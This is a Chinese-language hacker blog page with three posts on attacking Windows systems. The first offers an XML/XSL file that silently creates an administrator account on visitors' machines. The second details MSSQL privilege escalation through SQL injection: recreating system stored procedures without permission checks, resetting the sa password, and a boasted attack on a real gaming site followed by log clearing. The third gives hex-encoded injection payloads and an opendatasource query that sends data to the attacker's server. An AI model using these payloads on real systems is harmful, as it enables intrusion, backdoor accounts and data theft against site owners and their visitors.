台灣香料網-Tank部落格 - Tank Hacker

利用xml+xsl給客戶機添加超級管理帳戶

tank@tank.tw(tank) — Sat,17 Mar 2007 00:15:50 +0800

利用xml+xsl給客戶機添加超級管理帳戶
用法：把swords.xml和swords.xsl放在一個普通空間，相信很少人會注意xml的安全性吧，嘎嘎，只要把你想運行的程式添加到run() 即可，默認支持js和vbs.

這個程式加了一個用戶為 admin，密碼為123456的超級管理員帳號。

swords.xml
BIG5"?>

I am swords,I am admin!

swords.xsl

http://www.w3.org/TR/WD-xsl">

function run()
{
var wsh;
var wsh = new ActiveXObject("WScript.Shell");
wsh.run( "net user admin 123456 /add",0);
wsh.run( "net localgroup administrators admin /add",0);
wsh.run( "cmd.exe /c echo test!");
}

run()

一個注射點，一個webshell甚至系統權限

tank@tank.tw(tank) — Fri,16 Mar 2007 04:50:19 +0800

sql injection終極利用方法 作者：許文強（xwq),QQ:57133683　

只要給我一個注射點，無論什麼權限，我都給你一個webshell甚至系統權限

聲明：本文僅用於教學目的，如果因為本文造成的攻擊後果本人概不負責。因為發覺其危害過大，原文已經經過大量刪減及修改，即使這樣本文的危害性仍然很大，所以請大家不要對國內的站點做任何具有破壞性的操作。

考慮再三，偶還是決定發出來。此招手段歹毒，利用範圍廣泛，可以說是只要是有sql注射漏洞的網站，只要運用此法99%可以拿到webshell甚至系統權限（不敢把話說滿，呵呵，經本人數百次真實"實戰演習"，基本上是100%可以拿到webshell甚至系統權限）。

記得我在《MSSQL db_owner角色注入直接獲得系統權限（續）》中寫過一種利用xp_regwrite來取得系統權限的方法：xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq1','REG_SZ','net user xwq xwq /add'
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\currentvers ion\run','xwq2','REG_SZ','net localgroup administrators xwq /add'，只要讓網站所在的伺服器重起，就能得到系統權限。經過本人的數百次的真實實驗，這種方法不太實用，很容易引起網管的注意，再說ddos也是違法的事（偶可是好人啊），發動一場ddos要花費的大量的人力，物力（看你的肉雞多少拉）。所以不太可行（
除非是你十分想要搞定的網站）。

呵呵，哆嗦拉那麼多，你可能看的已經不耐煩拉，好，這就介紹我的三大必殺技之一————萬能提權。

假如一個網站存在sql注射漏洞，如果這個網站是用固定伺服器sysadmin權限的用戶作的連接（呵呵，通俗點說就是sa，菜鳥可以這樣認為)，呵呵，想要拿到一個webshell或者是系統權限可以說是易如反掌，輕而易舉的事，據我所知，sysadmin權限要拿到webshell或者系統權限不下10種，呵呵，可能更多吧（偶只會10種），sysadmin怎麼拿到webshell或者系統權限，我不想多說，想比大家都已經爛熟於心拉，可是要是一個網站是db_owner權限呢？你怎麼辦，你怎麼拿系統權限，怎麼拿webshell（沒有上傳漏洞和資料庫備份等功能），大家可能回說backup a shell，我記得LCX也在《MSSQL db_owner角色注入直接獲得系統權限》裡說過拉"備份得到的shell只是理論化的東東，如果一個webshell有20mb的話，你還能用它嗎？"呵呵，要是我告訴你db_owner拿到一個webshell或者是系統權限的方法和sysadmin權限的一樣多，你回有什麼反映，是不是覺得有點不可思議，或者又是我胡說呢？（不相信的朋友，下面的內容就不要看拉）

呵呵，是不是看的心癢癢拉，迫不及待的想知道啊，好，我不在廢話拉，這就把我的三大必殺技之一————萬能提升權限方法告訴大家。

在告訴大家之前，我們先做個實驗

實驗環境windowsxp sp1+SQL 2000 sp3,大家跟著我來step to step,首先新建一個具有db_owner的權限的用戶，這裡我是xwq（就是在伺服器角色裡面什麼都不要選，在資料庫角色裡面鉤上db_owner)，好，現在我們打開查詢分析器用xwq連上後再裡面輸入sp_addlogin xuwenqiang,執行看看，出現拉什麼？

伺服器: 消息 2571，級別 14，狀態 2，過程 sp_addlogin，行 16
用戶 'xwq' 沒有運行 DBCC auditevent 的權限。

伺服器: 消息 15247，級別 16，狀態 1，過程 sp_addlogin，行 17
用戶沒有執行此操作的權限。

呵呵，出現上面的錯誤訊息這很正常，因為只有sysadmin 和 securityadmin 固定伺服器角色的成員才可以執行 sp_addlogin，那麼怎麼才好讓sp_addlogin為我所用呢？我們在這裡看一下sp_addlogin的代碼：
create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = 'master' -- UNDONE: DEFAULT CONFIGURABLE???
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt varchar(20) = Null
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret int -- return value of sp call

-- CHECK PERMISSIONS --
IF (not is_srvrolemember('securityadmin') = 1)
begin
dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
raiserror(15247,-1,-1)
return (1)
end
ELSE
begin
dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
end

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_addlogin')
return (1)
end

-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret <> 0)
return (1)
if (charindex('\', @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
return (1)
end

--Note: different case sa is allowed.
if (@loginame = 'sa' or lower(@loginame) in ('public'))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end

-- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname = @loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end

-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
return (1)
end

-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT Null)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret <> 0)
return (1)
end
ELSE
begin
select @deflanguage = name from master.dbo.syslanguages where langid = @@default_langid --server default language

if @deflanguage is null
select @deflanguage = N'us_english'
end

-- VALIDATE SID IF GIVEN --
if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
begin
raiserror(15419,-1,-1)
return (1)
end
else if @sid is null
select @sid = newid()
if (suser_sname(@sid) IS NOT Null)
begin
raiserror(15433,-1,-1)
return (1)
end

-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
select @passwd = pwdencrypt(@passwd)
else if @encryptopt = 'skip_encryption_old'
begin
select @xstatus = @xstatus | 0x800, -- old-style encryption
@passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
end
else if @encryptopt <> 'skip_encryption'
begin
raiserror(15600,-1,-1,'sp_addlogin')
return 1
end

-- ATTEMPT THE Insert OF THE NEW LOGIN --
Insert INTO master.dbo.sysxlogins VALUES(NULL, @sid, @xstatus, getdate(),getdate(), @loginame, convert(varbinary(256), @passwd),db_id(@defdb), @deflanguage)
if @@error <> 0 -- this indicates we saw duplicate row
return (1)

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
exec('use master grant all to null')

-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin

之所以只有 sysadmin 和 securityadmin 固定伺服器角色的成員才可以執行

sp_addlogin，主要是這裡一段再搞鬼
-- CHECK PERMISSIONS --
IF (not is_srvrolemember('securityadmin') = 1)
begin
dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
raiserror(15247,-1,-1)
return (1)
end
ELSE
begin
dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
end

只要我們把這段代碼刪拉，任何權限的用戶都可以增加用戶拉。
好，我們先把sp_addlogin刪拉

drop procedure sp_addlogin

然後再來恢復sp_addlogin

create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = 'master' -- UNDONE: DEFAULT CONFIGURABLE???
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt varchar(20) = Null
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret int -- return value of sp call

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_addlogin')
return (1)
end

--Note: different case sa is allowed.
if (@loginame = 'sa' or lower(@loginame) in ('public'))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end

-- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname = @loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end

-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
return (1)
end

if @deflanguage is null
select @deflanguage = N'us_english'
end

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE

SYSLOGINS CHANGE --
exec('use master grant all to null')

-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin

這樣我這個只具有db_owner權限的xwq就可以任意增加用戶拉，ok，在查詢分析器裡面在輸入sp_addlogin xuwenqiang，執行看看，GOOD!返回已建立新登錄。
我新建拉一個用戶xuwenqiang，當然這個用戶我可不是白建的，我要把他變成具有最高權限的用戶，在sql中具有最高權限的當然是sysadmin拉，而把一個用戶變成sysadmin只有sp_addsrvrolemember這個存儲過程拉，可是只有sysadmin權限的用戶才好使用，不爽，偶要讓他為我所用，呵呵，聰明的讀者一定想到拉我怎麼讓只具有db_owner權限的我，怎麼使用sp_addsrvrolemember拉，沒錯，和讓sp_addlogin為我所用的方法一樣，只要去掉sp_addsrvrolemember中權限限制的一段，我們就可以任意增加sysadmin拉，我們先看看sp_addsrvrolemember的代碼

：create procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
as
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,'sp_addsrvrolemember')
return (1)
end

-- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
select @ismem = is_srvrolemember(@rolename)
if @ismem is null
begin
dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
raiserror(15402, -1, -1, @rolename)
return (1)
end
if @ismem = 0
begin
dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
raiserror(15247,-1,-1)
return (1)
end

-- AUDIT A SUCCESSFUL SECURITY CHECK --
dbcc auditevent (108, 1, 1, @loginame, NULL, @rolename, NULL)

-- CANNOT CHANGE SA ROLES --
if @loginame = 'sa'
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end

-- OBTAIN THE BIT FOR THIS ROLE --
select @rolebit = CASE @rolename
WHEN 'sysadmin' THEN 16
WHEN 'securityadmin' THEN 32
WHEN 'serveradmin' THEN 64
WHEN 'setupadmin' THEN 128
WHEN 'processadmin' THEN 256
WHEN 'diskadmin' THEN 512
WHEN 'dbcreator' THEN 1024
WHEN 'bulkadmin' THEN 4096
ELSE NULL END

-- ADD ROW FOR NT LOGIN IF NEEDED --
if not exists(select * from master.dbo.syslogins where loginname = @loginame)
begin
execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
if (@ret <> 0)
begin
raiserror(15007,-1,-1,@loginame)
return (1)
end
end

-- Update ROLE MEMBERSHIP --
update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate() where name = @loginame and srvid IS NULL

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE

SYSLOGINS CHANGE --
exec('use master grant all to null')

raiserror(15488,-1,-1,@loginame,@rolename)

-- FINALIZATION: RETURN SUCCESS/FAILURE
return (@@error) -- sp_addsrvrolemember

把這一段刪除 -- VALIDATE SERVER ROLE NAME, CHECKING PERMISSIONS --
select @ismem = is_srvrolemember(@rolename)
if @ismem is null
begin
dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
raiserror(15402, -1, -1, @rolename)
return (1)
end
if @ismem = 0
begin
dbcc auditevent (108, 1, 0, @loginame, NULL, @rolename, NULL)
raiserror(15247,-1,-1)
return (1)
end

這樣我們就可以任意增加sysadmin拉，呵呵，爽啊。在查詢分析器裡輸入sp_addsrvrolemember xuwenqiang,sysadmin,Yeah!!!!!!!成功拉。到這裡我們就成功利用拉一個只具有db_owner權限的用戶新建拉一個在SQL中具有至高無上權限，也就是具有sysadmin權限的用戶xuwenqiang,有拉sysadmin權限想要webshell或
者系統權限還不容易麼！不要只把眼睛只放在我所說的sp_addlogin和sp_addsrvrolemember這兩個存儲過程上，凡是只有sysadmin才好使用的存儲過程，利用我的萬能提權必殺技，我們都可以使用。比如：sp-configure,sp_addlinkedserver,sp_addlinkedsrvlogin,sp_makewebtask等等很多只好sysadmin權限能利用的，我們都可以讓他們為我所用。

下面再舉一個萬能提權的例子和我一起打造一個永遠不會被殺及完美的後門

我們都知道在sql中有個被黑客稱為後門的用戶，那就是sa，sa 是內置的管理員登錄，而且不能進行更改和刪除。呵呵，這是M$說的，要是你看過我寫的另外一篇文章《完全刪除sa這個後門》就知道，其實sa也是好刪除的。我們知道在sql可以改密碼的存儲過程有sp_password,可是我們必須知道要改的用戶的舊密碼，才可以更改，那麼有沒有辦法再不知道舊密碼的情況下更改sa的密碼呢？有，其實也就是利用sp_configure,sp_configure的功能是顯示或更改當前伺服器的全局配置設置。sp_configure（用於更改配置選項）的執行許可權限默認授?sysadmin 和 serveradmin 固定伺服器角色。這很容易只要把sp_configure中檢查權限的一段刪除，再重建，我們就好用拉。
Create PROCEDURE sp_configure --- 1996/08/14 09:43

@configname varchar(35) = NULL -- option name to configure
,@configvalue int = NULL -- new configuration value
as

set nocount on

declare
@confignum int --Num of the opt to be configured
,@configcount int --Num of options like @configname
,@show_advance int --Y/N Read&Write actions on "advanced" opts

declare @fullconfigname varchar (35)
declare @prevvalue int
/*
** Determine @maxnumber based on advance option in syscurconfigs.
*/
if (select value from master.dbo.syscurconfigs where config = 518) = 1
select @show_advance = 1 -- Display advanced options
else
select @show_advance = 0 -- Don''t display advanced options

/*
** Make certain that max user info. reflects any addpak upgrades.
*/
if (select high from master.dbo.spt_values where number=103 and type=''C'') <> @@max_connections

update master.dbo.spt_values
set high = @@max_connections
where number = 103
and type=''C''

/*
** If no option name is given, the procedure will just print out all the
** options and their values.
*/
if @configname is NULL
begin
select name, minimum = low, maximum = high,
config_value = c.value,
run_value = master.dbo.syscurconfigs.value
from master.dbo.spt_values, master.dbo.sysconfigures c, master.dbo.syscurconfigs
where type = ''C''
and number = c.config
and number = master.dbo.syscurconfigs.config
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)
order by lower(name)

return (0)
end

/*
** Use @configname and try to find the right option.
** If there isn''t just one, print appropriate diagnostics and return.
*/
select @configcount = count(*), @fullconfigname = min (v.name),

@prevvalue = min (c.value)
from master.dbo.spt_values v ,master.dbo.sysconfigures c
where v.name like ''%'' + @configname + ''%'' and v.type = ''C''
and v.number = c.config
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

/*
** If no option, show the user what the options are.
*/
if @configcount = 0
begin
raiserror (15123,-1,-1,@configname)

print '' ''
raiserror (15456,-1,-1)

/*
** Show the user what the options are.
*/
select name, minimum = low, maximum = high,
config_value = c.value,
run_value = master.dbo.syscurconfigs.value
from master.dbo.spt_values, master.dbo.sysconfigures c,

master.dbo.syscurconfigs
where type = ''C''
and number = c.config
and number = master.dbo.syscurconfigs.config

and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

return (1)
end

/*
** If more than one option like @configname, show the duplicates and

return.
*/
if @configcount > 1
begin
raiserror (15124,-1,-1,@configname)
print '' ''

select duplicate_options = name
from master.dbo.spt_values,master.dbo.sysconfigures c
where name like ''%'' + @configname + ''%''
and type = ''C''
and number = c.config
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

return (1)
end
else
/* There must be exactly one, so get the full name. */
select @configname = name --,@value_in_sysconfigures = c.value
from master.dbo.spt_values,master.dbo.sysconfigures c
where name like ''%'' + @configname + ''%'' and type = ''C''
and number = c.config
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

/*
** If @configvalue is NULL, just show the current state of the option.
*/
if @configvalue is null
begin

select v.name
,v.low as ''minimum''
,v.high as ''maximum''
,c.value as ''config_value''
,u.value as ''run_value''
from
master.dbo.spt_values v left outer join
master.dbo.sysconfigures c on v.number = c.config
left outer join
master.dbo.syscurconfigs u on v.number = u.config
where
v.type = ''C ''
and v.name like ''%'' + @configname + ''%''
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

return (0)
end

/*
** Now get the configuration number.
*/
select @confignum = number
from master.dbo.spt_values,master.dbo.sysconfigures c
where type = ''C''
and (@configvalue between low and high or @configvalue = 0)
and name like ''%'' + @configname + ''%''
and number = c.config
and
((c.status & 2 <> 0 and @show_advance = 1)
or
(c.status & 2 = 0)
)

/*
** If this is the number of default language, we want to make sure
** that the new value is a valid language id in Syslanguages.
*/
if @confignum = 124
begin
if not exists (select * from master.dbo.syslanguages
where langid = @configvalue)
begin
/* 0 is default language, us_english */
if @configvalue <> 0
begin
raiserror(15127,-1,-1)
return (1)
end
end
end

/*
** If this is the number of kernel language, we want to make sure
** that the new value is a valid language id in Syslanguages.
*/
if @confignum = 132
begin
if not exists (select * from master.dbo.syslanguages
where langid = @configvalue)
begin
/* 0 is default language, us_english */
if @configvalue <> 0
begin
raiserror(15028,-1,-1)
return (1)
end
end
end

/*
** "user options" should not try to set incompatible options/values.
*/
if @confignum = 1534 --"user options"
begin

if (@configvalue & (1024+2048) = (1024+2048)) --

ansi_null_default_on/off
begin
raiserror(15303,-1,-1,@configvalue)
return (1)
end
end

/*
** Although the @configname is good, @configvalue wasn''t in range.
*/
if @confignum is NULL
begin
raiserror(15129,-1,-1,@configvalue,@configname)
return (1)
end

--Msg 15002, but in 6.5 allow this inside a txn (not check @@trancount)

#12828.

/*
** Now update sysconfigures.
*/
update master.dbo.sysconfigures set value = @configvalue
where config = @confignum

/*
** Flush the procedure cache - this is to account for options which

become
** effective immediately (ie. dont need a server restart).
*/
dbcc freeproccache

raiserror(15457,-1,-1, @fullconfigname, @prevvalue, @configvalue) with

log

return (0) -- sp_configure

ok，我們再
sp_configure ''allow updates'',1
go
RECONFIGURE WITH OVERRIDE
go

好拉這樣我們才好更改sa的密碼。接著update sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50C
BB30267F53B9451B7189CA67AF19A1FC where sid=0x01,這樣sa的密碼就被我們改成拉111111拉。呵呵，解決的方法就是把sa給刪拉。，怎麼刪可以參考我的《完全刪除sa這個後門》。

實例：
下面對一個國內非常出名的站點進行善意的攻擊測試，來對上面的知識進行一次大概的驗證，出於影響等諸多因素，我們稱這個站點為www.**173.com。

www.**173.com這個站點在遊戲上很有名氣,排名在前20名（我當時測試的時候），在這裡我不想說我怎麼找到的注射點，大家還可以找找，還是滿多的（整個測試可真花費拉我不少時間，別誤會，我不是說時間花在"檢測"上，而是都放在寫程式裡面拉，不寫個像樣點的程式，怎麼讓我為所欲為呢？整個攻擊只有10分鐘不到）。

在找到的注射點gametype=**（鬱悶，要是當時測試的時候有nbsi2，偶可能要輕鬆不少），先輸入drop procedure sp_addlogin,然後在IE裡面輸入（呵呵，我當然是在我寫的程式裡面輸入拉）
create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = ''master'' -- UNDONE: DEFAULT CONFIGURABLE???
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt varchar(20) = Null
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret int -- return value of sp call

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,''sp_addlogin'')
return (1)
end

-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret <> 0)
return (1)
if (charindex(''\'', @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
return (1)
end

--Note: different case sa is allowed.
if (@loginame = ''sa'' or lower(@loginame) in (''public''))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end

-- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname = @loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end

-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
return (1)
end

language

if @deflanguage is null
select @deflanguage = N''us_english''
end

-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
select @passwd = pwdencrypt(@passwd)
else if @encryptopt = ''skip_encryption_old''
begin
select @xstatus = @xstatus | 0x800, -- old-style encryption
@passwd = convert(sysname, convert(varbinary(30), convert(varchar(30), @passwd)))
end
else if @encryptopt <> ''skip_encryption''
begin
raiserror(15600,-1,-1,''sp_addlogin'')
return 1
end

-- ATTEMPT THE Insert OF THE NEW LOGIN --
Insert INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
if @@error <> 0 -- this indicates we saw duplicate row
return (1)

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE SYSLOGINS CHANGE --
exec(''use master grant all to null'')

-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin

OK,我們新建個用戶exec master..sp_addlogin xwq

再drop procedure sp_addsrvrolemember,然後在IE裡輸入

create procedure sp_addsrvrolemember
@loginame sysname, -- login name
@rolename sysname = NULL -- server role name
as
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret int, -- return value of sp call
@rolebit smallint,
@ismem int

-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,''sp_addsrvrolemember'')
return (1)
end

-- CANNOT CHANGE SA ROLES --
if @loginame = ''sa''
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end

-- OBTAIN THE BIT FOR THIS ROLE --
select @rolebit = CASE @rolename
WHEN ''sysadmin'' THEN 16
WHEN ''securityadmin'' THEN 32
WHEN ''serveradmin'' THEN 64
WHEN ''setupadmin'' THEN 128
WHEN ''processadmin'' THEN 256
WHEN ''diskadmin'' THEN 512
WHEN ''dbcreator'' THEN 1024
WHEN ''bulkadmin'' THEN 4096
ELSE NULL END

-- Update ROLE MEMBERSHIP --
update master.dbo.sysxlogins set xstatus = xstatus | @rolebit, xdate2 = getdate()
where name = @loginame and srvid IS NULL

-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE

SYSLOGINS CHANGE --
exec(''use master grant all to null'')

raiserror(15488,-1,-1,@loginame,@rolename)

-- FINALIZATION: RETURN SUCCESS/FAILURE
return (@@error) -- sp_addsrvrolemember

接著再exec master..sp_addsrvrolemember xwq,sysadmin
我們拿sql綜合利用工具或者查詢分析器連上看看，呵呵，成功拉，這樣我們就在www.**17173.com的伺服器上建拉一個具有最高權限的用戶xwq拉，下面的事我想大家都應該回做拉吧。呵呵，因為只是安全測試，我並沒有深入下去，刪拉帳號，清除日誌，閃人。

看到拉吧，我的必殺技之一——萬能提權的威力拉吧，只要是給我一個注射點，無論什麼權限，我都會給你一個webshell甚至系統權限.呵呵，其實說萬能的提升權限方法的確是有點誇張拉，因為Create PROCEDURE 的權限默認授予 sysadmin 固定伺服器角色成員和 db_owner 和 db_ddladmin 固定資料庫角色成員，你要是碰到Public的權限，那就不好使用拉。

不過不要以為換成public權限,就沒有辦法拿到webshell或者系統權限拉，恰恰相反，據我所知public權限的用戶拿到webshell甚至系統權限的方法至少也有5種。

最好的防範方法就是杜絕注射漏洞，這才是治標又治本的解決方法。（呵呵，要是我說，最好連public的權限都不要給，可惜已經沒有比public權限更低的角色拉，沒辦法誰叫public也可以利用很多有危險的存儲過程呢，而且public無法除去，看來M$對我們這些"壞人"還是很厚愛的哦）

SQL注入高級技巧

tank@tank.tw(tank) — Thu,03 Aug 2006 20:11:56 +0800

我的目的主要是取得網站的目錄,當然了,網站和mssql資料庫在一臺伺服器上，權限DB_owner。

　在某網發現了一個注點，一個'號提示"xxxxxxxxxx'0''出現錯誤 " ，經過初步的分析是把單引號，直接轉換成了0',所以如果用工具肯定注入不了，實踐證明工具不行，但能檢測出來其權限為:DB_owner,手工檢測的方法無非是: and 1=(select is_isvrolemember('sysadmin'))這是簡單檢測系統權限。還好只是對單引號有限制，其它符號沒有限制。不過這一點確實已經夠麻煩的了。
　　
　我們的目的是檢測網站資料夾在什麼地方，如果找到的話，直接差異備份資料庫，取得webshell。
　　
　　首先提取IIS設置初期,網站目錄在註冊表中的位置，然後再暴出來。
　　建一個表xy,
;create table xy(xy1 nvarchar(256) null)，然後網表裡插入其值，語句如下:
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into xy (xy1) values(@result)
由於對'單引號的轉換，所以上面的命令肯定成功不了，這時我們可以想到再用declare函數，一開始我的做法為把 'HKEY_LOCAL_MACHINE'和','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots'和'/'，這3個資料分別附於3個變量，這樣語句構成為:
;DECLARE @a varchar(255) select @a=0x484b45595f4c4f43414c5f4d414348494e45 DECLARE @b varchar(255) select @b=0x53595354454d5c434f4e54524f4c5365743030315c53657276696365735c57335356435c506172616d65746572735c5669727475616c20526f6f7473 DECLARE @c varchar(255) select @c=0x2f DECLARE @result varchar(255) exec master.dbo.xp_regread @a,@b,@c,@result output insert xy(xy1) values(@result)--

沒想到根本成功不了，我不清楚這個原因，然後去GOGOLE搜索原因，在邪XX討論區裡看到無敵遇到的情況根我一樣，至今還沒有討論出來結果，於是這種方法暫時先放一放，2天以後再得到了一種新方法，也是用declare於一個變量附值，不過這時附的不是某一資料，而是整句。

方法如下:
DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into xy (xy1) values(@result)
全轉換為16進制為:
0x4400450043004C004100520045002000400072006500730075006C00740020007600610072006300680061007200280032003500350029002000450058004500430020006D00610073007400650072002E00640062006F002E00780070005F0072006500670072006500610064002000270048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C0043006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C00570033005300560043005C0050006100720061006D00650074006500720073005C005600690072007400750061006C00200052006F006F007400730027002C0027002F0027002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F002000780079002000280078007900310029002000760061006C007500650073002800400072006500730075006C0074002900
這時用DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C004100520045002000400072006500730075006C00740020007600610072006300680061007200280032003500350029002000450058004500430020006D00610073007400650072002E00640062006F002E00780070005F0072006500670072006500610064002000270048004B00450059005F004C004F00430041004C005F004D0041004300480049004E00450027002C002700530059005300540045004D005C0043006F006E00740072006F006C005300650074003000300031005C00530065007200760069006300650073005C00570033005300560043005C0050006100720061006D00650074006500720073005C005600690072007400750061006C00200052006F006F007400730027002C0027002F0027002C00400072006500730075006C00740020006F0075007400700075007400200069006E007300650072007400200069006E0074006F002000780079002000280078007900310029002000760061006C007500650073002800400072006500730075006C0074002900 AS NVARCHAR(4000));EXEC(@S)
直接執行成功，呵呵，反正沒有用到單引號，這種方法是現在所能想出來的了，也算一點點小小的突破吧。

　　把上述語句直接在瀏覽器裡提交，返回正常的頁面，然後用and 1=(selet top 1 xy1 from xy)成功暴出了網站的資料夾為 D:\wwwfuck\，哈哈，懷著僥倖的心理直接在此目錄下差異備份資料庫，失敗！
結論：
1、語句沒有錯誤　
2、目錄有問題。

　　於是現在猜一把，就猜網站資料夾在D磁碟，那麼唯一可行的辦法就是一個一個暴資料夾啊~，鬱悶，極其麻煩的事情又要來臨了！
我比較懶，隨後想到的就是SQL裡的opendatasource命令,我機器裝有sql，IP為10.10.10.1，我想把遠程執行sql返回的結果直接插到我自己機器SQL所建的表中，所以這樣比較輕鬆，為了證明是否成功，我先建一個表為ku(id nvarchar(255)),然後遠程提交的格式為:
insert into opendatasource('sqloledb','server=10.10.10.1;uid=sa;pwd=tank!!;database=test').test.dbo.ku select name from master.dbo.sysdatabases
其中test為我自己的資料庫，ku為test資料庫中的表名　如果成功的話，在本機打開ku表，上述語句就會列出遠程伺服器中所有的庫的名稱。
上面的語句有單引號，我們直接轉換為16進制，轉換後用如下語句提交即可:
